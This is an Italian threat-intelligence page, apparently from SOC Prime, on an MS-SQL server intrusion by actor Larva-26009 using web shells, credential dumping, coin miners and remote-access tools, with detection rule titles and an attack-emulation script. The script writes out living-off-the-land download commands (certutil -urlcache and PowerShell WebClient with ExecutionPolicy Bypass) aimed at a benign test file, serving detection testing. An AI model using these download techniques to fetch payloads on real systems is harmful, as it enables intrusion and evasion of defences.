SOC Prime Bias: Alto

30 Jul 2026 15:17 UTC

Intrusione nel server MS SQL utilizza GoToHTTP e SoftEther VPN per l’accesso remoto

Author Photo
SOC Prime Team linkedin icon Segui
Intrusione nel server MS SQL utilizza GoToHTTP e SoftEther VPN per l’accesso remoto
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Un attore di minaccia tracciato come Larva-26009 ha preso di mira i server MS-SQL per distribuire diversi payload di malware, tra cui XMRig CoinMiner e SoftEther VPN. L’intrusione ha comportato l’installazione di web shell per la persistenza, il furto di credenziali tramite il dump del registro e l’uso di diverse utility di escalation dei privilegi. L’attaccante ha anche utilizzato caricatori specializzati e file crittografati per eludere i meccanismi di rilevamento della sicurezza tradizionali.

Indagine

Il Centro di Intelligenza della Sicurezza AhnLab (ASEC) ha rilevato l’intrusione mentre monitorava l’attività di attacco che prendeva di mira i server MS-SQL. L’indagine ha scoperto l’uso di certutil.exe per decrittare i file delle web shell, insieme ad attività da riga di comando associata al dump delle credenziali e al movimento laterale. I ricercatori hanno anche documentato diversi strumenti di escalation dei privilegi in stile Potato e caricamenti di shellcode specializzati, inclusi RingQ.

Mitigazione

Gli amministratori dovrebbero imporre password forti, complesse e regolarmente ruotate per tutti gli account di servizio dei database per ridurre il rischio di attacchi brute-force. I server di database dovrebbero essere protetti da firewall che limitano l’accesso pubblico e minimizzano la superficie di attacco esposta. Anche i software di sicurezza e le soluzioni di protezione degli endpoint dovrebbero essere costantemente aggiornati per rilevare firme di malware conosciute e attività dannose correlate.

Risposta

Se viene rilevata attività dannosa, i team di sicurezza dovrebbero isolare immediatamente i server MS-SQL compromessi e i server web IIS per prevenire ulteriori movimenti laterali. I rispondenti dovrebbero controllare gli account utente creati di recente, in particolare quelli che utilizzano schemi di nomi sospetti come i nomi che terminano con $. Inoltre, dovrebbe essere eseguita la forense della memoria per identificare shellcode iniettato e scoprire servizi VPN o di desktop remoto non autorizzati in esecuzione sui sistemi compromessi.

Flusso di Attacco

Rilevamenti

Download o Upload tramite Powershell (via cmdline)

Team SOC Prime
29 Lug 2026

Stringhe Powershell Sospette (via cmdline)

Team SOC Prime
29 Lug 2026

Possibile Enumerazione o Manipolazione di Account o Gruppi (via cmdline)

Team SOC Prime
29 Lug 2026

Possibile Esecuzione di Comandi tramite Procedura Memorizzata Estesa di SQL xp_cmdshell (via cmdline)

Team SOC Prime
29 Lug 2026

Possibile Uso di PING per Esecuzione Ritardata (via cmdline)

Team SOC Prime
29 Lug 2026

Uso di Certutil per Codifica Dati e Operazioni Cert (via cmdline)

Team SOC Prime
29 Lug 2026

LOLBAS Bitsadmin (via cmdline)

Team SOC Prime
29 Lug 2026

Possibile Dumping di SAM/SYSTEM/SECURITY (via cmdline)

Team SOC Prime
29 Lug 2026

Chiamata a Metodi .NET Sospetti da Powershell (via powershell)

Team SOC Prime
29 Lug 2026

Possibile Abuso di Dominio di Sviluppo Cloudflare (via dns)

Team SOC Prime
29 Lug 2026

IOC (HashMd5) per rilevare: Studio di Caso: Attacco Mirato su un Server MS-SQL che Coinvolge l’Installazione di GotoHTTP e SoftEther VPN

Regole AI SOC Prime
29 Lug 2026

IOC (SourceIP) per rilevare: Studio di Caso: Attacco Mirato su un Server MS-SQL che Coinvolge l’Installazione di GotoHTTP e SoftEther VPN

Regole AI SOC Prime
29 Lug 2026

IOC (DestinationIP) per rilevare: Studio di Caso: Attacco Mirato su un Server MS-SQL che Coinvolge l’Installazione di GotoHTTP e SoftEther VPN

Regole AI SOC Prime
29 Lug 2026

Rilevare Esecuzione Remota di Script tramite Certutil e PowerShell [Windows Powershell]

Regole AI SOC Prime
29 Lug 2026

Indicatori di Attacco Mirato al Server MS-SQL [Creazione Processo Windows]

Regole AI SOC Prime
29 Lug 2026

Esecuzione di Simulazione

Prerequisito: Il Controllo Pre-volo di Telemetria & Baseline deve essere passato.

Ragione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrazione & Comandi dell’Attacco: L’avversario ha ottenuto l’accesso iniziale e intende scaricare un payload di seconda fase per stabilire la persistenza. Per evitare sospetti, decidono di utilizzare tecniche “Living-off-the-Land” (LotL). Proveranno due metodi: primo, usando certutil.exe per scaricare un file tramite il flag -urlcache , e secondo, utilizzando una chiamata legacy System.Net.WebClient in PowerShell. Questo imita un attaccante che tenta di integrarsi con il traffico amministrativo legittimo mentre scarica strumenti.

  • Script di Test di Regressione:

    # Script di Simulazione per Rilevamento Download di Certutil e PowerShell
    # Nota: Questo script tenta di scaricare un file di testo innocuo da un URL pubblico.
    
    $TargetUrl = "https://raw.githubusercontent.com/socprime/test-payloads/main/test.txt"
    $LocalPathCertutil = "$env:TEMPcertutil_download.txt"
    $LocalPathPS = "$env:TEMPps_download.txt"
    
    Write-Host "[+] Avvio Simulazione..." -ForegroundColor Cyan
    
    # Metodo 1: Download Certutil URL Cache
    Write-Host "[*] Esecuzione tecnica di download Certutil..." -ForegroundColor Yellow
    Start-Process "certutil.exe" -ArgumentList "-urlcache -split -f $TargetUrl $LocalPathCertutil" -NoNewWindow -Wait
    
    # Metodo 2: Download PowerShell WebClient
    Write-Host "[*] Esecuzione tecnica PowerShell WebClient..." -ForegroundColor Yellow
    powershell.exe -ExecutionPolicy Bypass -Command "(new-object System.Net.WebClient).DownloadFile('$TargetUrl', '$LocalPathPS')"
    
    Write-Host "[+] Comandi di Simulazione Eseguiti." -ForegroundColor Green
  • Comandi di Pulizia:

    # Script di Pulizia
    Remove-Item -Path "$env:TEMPcertutil_download.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPps_download.txt" -ErrorAction SilentlyContinue
    Write-Host "[+] Pulizia Completata." -ForegroundColor Green